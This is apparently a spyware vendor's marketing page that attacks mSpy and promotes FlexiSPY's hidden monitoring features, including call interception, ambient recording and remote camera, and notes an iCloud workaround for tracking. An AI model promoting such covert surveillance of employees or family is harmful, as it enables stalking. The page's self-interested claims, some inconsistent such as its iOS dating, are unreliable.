As a general rule, if you are ever told by a spy app’s customer service that features will work at a later date with an offer to freeze your account until they do, we recommend you request an immediate refund, get a credit card charge-back, or look at trade-in programs for more reliable solutions.

2. An Honest and Reliable Refund Policy

mSpy advertises a 10-Day Money-Back Guarantee. However, many people find out almost immediately that partial or full refunds are incredibly hard to get, despite what it says in their marketing material.

Read mSpy’s fine print and you’ll see why their airtight refund policy is misleading at best, and downright factitious at worst.

Don’t just take our word for it, take a look at some of the comments customers are making on one of mSPY’s top affiliate sites, https://www.mspyreview.net/

Some of the complaints listed on Better Business Bureau also provide revealing insight to mSPY’s refund and other customer service practices.

Common refund issues highlighted range from being charged a full amount during a free trial through to being unable to obtain a refund within minutes of purchase (despite strictly adhering to terms of service).

Does mSpy’s iOS Product Really Work?

Apple’s new security policies have meant that most spy apps no longer offer a viable product for iOS devices that are not jailbroken.

For mSpy’s iOS product to track and upload any data the user will be required to deactivate 2FA on the target device. Unfortunately, towards the end of 2019 Apple no longer allows this action, having quietly removed the option in its iOS 10 release.

mSpy's customer service informed us that they are currently working on a solution get around Apple’s 2FA policy. And as this would be a gargantuan undertaking, we won’t be holding our breath as we wait for an update to fix this issue.

For now, mSpy does offer an alternative solution, the viability of which we leave up to the reader.

Create a new iCloud ID

The alternative solution offered by mSpy is to simply to create a new iCloud ID for the target device. Apple policy stipulates that within the first two weeks the owner of a newly created iCloud account will still have the choice to activate or deactivate 2FA.

Again, if you are openly monitoring younger children this may not be an issue as you would be able to impose on them which account to use. However, if you are monitoring an employee or an older child, this can prove problematic.

The bottom line is:

If you are looking to monitor a non-jailbroken iOS device with mSpy you must not only have control over the user’s current Apple credentials, but also the authority to force them to create a new Apple email for any data to be tracked.

To find out more why iCloud Spy Apps are not a viable choice see here.

However, if you feel you've learnt enough about mSpy you may want to skip straight to the most reliable iPhone monitoring app on the market here.

mSpy Jailbreak VS. FlexiSPY Jailbreak

FlexiSPY and mSPY both offering iPhone jailbreak solutions – however, when compared closely — there’s a clear mismatch with regards to features, compatibility, and reliability.

First off, FlexiSPY’s iPhone Spy App has over 50 features, compared to mSpy's jailbroken that has only 8 true features.

Furthermore, FlexiSPY is the only solution that can spy on newer iPhones like the iPhone X, 8, 7, 6, 5, & SE. Most competitors, including mSPY, market an iCloud spy app solution they refer to as “No-Jailbreak” solution that do not work as advertised.

On the other hand, FlexiSPY offers the most affordable iPhone spy app on the market by far.

At just $19.99/week, iPhone EXTREME Weekly is not only the most affordable solution on the market, it also offers the most value for money. Keep in mind that FlexiSPY for iPhone, requires you to jailbreak the device have access to reconfigure it as required.

With FlexiSPY EXTREME Weekly, you’ll get Advanced Features you can’t find anywhere else including IM Call Recording, Spy Call, RemCam, RemVid, Ambient Recording, and more.

Compare features available with FlexiSPY Jailbreak and mSpy below:  

IMAGE: TABLE

As you can see,compared to mSpy’s product, FlexiSPY offers far more features, depth, and unrivaled compatibility when it comes to monitoring iPhones.

Will my Child’s Data be Safe with mSpy?

Given the company’s track record when it comes to data security, the better question to ask is - will my child be more safe, or less safe with mSpy installed on their device?

Although mSpy has not been hacked since May of 2018, their history of data leaks should be a clear warning sign for any loving parent. Just imagine purchasing a parental control app with the goal of keeping your child safe, only to end up having their name or private photos leaked to god knows where.

Furthermore, mSpy’s track record for responding to breaches doesn’t inspire any confidence. For example, in a previous 2015 leak, hackers stole data from mSpy’s servers and posted it on the deep web. After initially denying the breach, mSpy promised to tighten security. Two weeks later, Krebs Security noted that they still had not removed links to screenshots of mobile devices running mSpy.

When it comes to your children, data security is vital. And for an app whose main platform is ‘parental control’ and keeping children safe, mSPY’s record of multiple leaks over the years is quite frankly, appalling.

Here is one former customer describing their mSpy experience on Better Business Bureau,

“If I can't trust a company whose practicing bad business, how can I trust them with private information from my cell phone”.

Find out more about spy app data leaks and consider all your options before making your decision.

How to tell if mSpy is installed on my phone?

To see if mSpy is installed on your phone, simply go to app list, and if you see an icon titled ‘Update Service’ then the device has mSpy installed. Also, for Android 10 Devices, the mSpy icon can be found in the app drawer under the same name, ‘Update Service’.

Next let’s look at uninstallation.

How to Uninstall mSpy from my phone?

To uninstall mSpy from your phone, Go to your app list and scroll down to ‘Update Service’ and select uninstall.

Then, in your mSpy portal go to the device management page and select unlink and uninstall. mSpy will be removed from the device completely.

Why is FlexiSPY Better?

FlexiSPY offers a product with unique features that are designed to work with Android, iOS, PC, & MAC devices.

Advanced features such as Call Recording, Call Intercept, Ambient Recording, REM CAM, and REM VID are only available with FlexiSPY and offer insights for serious detectives.

Also, FlexiSPY is the leading instant messaging monitoring application. When it comes to tracking IMs, no competitors come close to the depth and coverage provided by this original spy app.

  • 30+ features more than any competitor  
  • Most advanced features of any monitoring app
  • 3 Packages: LITE, PREMIUM, EXTREME to match any budget
  • Features work as advertised on Android and IOS
  • The only spy app that can be completely hidden on Android 10 Devices
  • Unique free mobile app that provides up-to-date data on-the-go available for Android and iOS
  • The most affordable and only reliable iPhone Monitoring app on the market
  • Industry Leading Customer Support and After-Sales Services  
  • Trusted Data Security with a proven track record
  • Trade-in Programs designed to help our competitor’s scammed or unsatisfied customers